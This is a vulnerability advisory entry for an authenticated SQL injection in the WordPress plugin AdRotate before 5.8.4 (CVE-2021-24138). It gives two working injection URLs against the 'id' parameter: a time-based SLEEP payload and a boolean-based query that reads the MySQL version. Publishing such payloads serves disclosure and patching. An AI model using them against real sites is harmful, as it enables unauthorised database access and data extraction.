Lucene search
Nguyen Anh TienWPEX-ID:AAFAC655-3616-4B27-9D0F-1CBC2FAF0151HistoryJun 03, 2020 - 12:00 a.m.
AdRotate < 5.8.4 - Authenticated SQL Injection
2020-06-0300:00:00
Nguyen Anh Tien
393
0.001 Low
EPSS
Percentile
48.1%
Authenticated SQL injection in the AdRotate 5.8.3.1 exists via param “id”. However, this requires an admin privileged user. NOTE: The plugin author mistook this SQLi bug for XSS but the remedy remains OK.
Param "id" is vulneable to SQL Injeciton.
Example 1:
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP%2810%29
Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 AND SLEEP(10)
This query will delay page load by 10 seconds
Example 2:
by using a boolean-based technique, one can extract info about the system.
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D%28SELECT+IF+%28+GREATEST%28+ORD%28MID%28%40%40version%2C+1%2C+1%29%29%2C+1%29+%3D+53%2C+1%2C+0%29%29
Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0))
This query will check if the first char of MySQL version is "5" or not.
Related
cve
cve
CVE-2021-24138
2021-03-18 15:15:14
prion
prion
Sql injection
2021-03-18 15:15:00
nvd
nvd
CVE-2021-24138
2021-03-18 15:15:14
wpvulndb
wpvulndb
AdRotate < 5.8.4 - Authenticated SQL Injection
2020-06-03 00:00:00
cvelist
cvelist
CVE-2021-24138 AdRotate < 5.8.4 - Authenticated SQL Injection
2021-03-18 14:57:49